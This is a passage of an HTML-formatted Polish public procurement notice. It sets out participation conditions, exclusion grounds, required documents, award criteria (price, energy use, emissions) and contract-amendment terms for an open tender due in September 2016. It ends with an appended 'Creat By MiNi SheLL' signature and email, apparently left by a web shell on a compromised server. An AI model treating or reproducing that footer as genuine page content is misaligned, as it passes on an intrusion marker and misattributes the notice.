                Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie - oświadczenie Wykonawcy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie - oświadczenie Wykonawcy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie - oświadczenie Wykonawcy<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy o braku podstawy wykluczenia</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:
a) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
b)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 3 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt b i c:
składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">wypełniony formularz oferty, oświadczenie dotyczące podmiotu, na którego zasoby powołuje się wykonawca, oświadczenie dotyczące podwykonawcy niebędącego podmiotem, na którego zasoby powołuje się wykonawca, informacja w związku z poleganiem na zasobach innych podmiotów, oświadczenie dotyczące podanych informacji</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>zużycie energii</td><td>20</td></tr><tr><td>emisja zanieczyszczeń</td><td>10</td></tr><tr><td>emisja dwutlenku węgla</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmiany umowy w następujących przypadkach:
1.	Wysokość wynagrodzenia wykonawcy może ulec zmianie w przypadku zmiany:
a)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r.  minimalnym wynagrodzeniu za pracę,
b)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu, lub wysokości stawki składki na ubezpieczenia społeczne i zdrowotne,
 jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
2.	Zmiana wysokości wynagrodzenia wykonawcy następować będzie o kwotę stanowiącą iloczyn liczby pracowników zatrudnionych przez wykonawcę wykonujących przedmiot umowy oraz kwoty podwyższenia kosztów ich pracy wynikających ze zmian, o których mowa w pkt. 2.1.
3.	Wykonawca, występując o zmianę wynagrodzenia, zobowiązany jest wykazać, że kwota podwyżki, o którą występuje, jest mu należna w obliczonej przez niego wysokości, oraz, że zmiany, o których mowa w pkt. 2.3, mają wpływ na koszty wykonania zamówienia.
4.	Wynagrodzenie może ulec zmianie w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym w szczególności zmiany podatku Vat;
5.	Termin wykonania może ulec zmianie w przypadku przedłużenia się procedury przetargowej;
6.	Zamawiający dopuszcza zmianę umowy w innych przypadkach określonych w art. 144 pzp.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com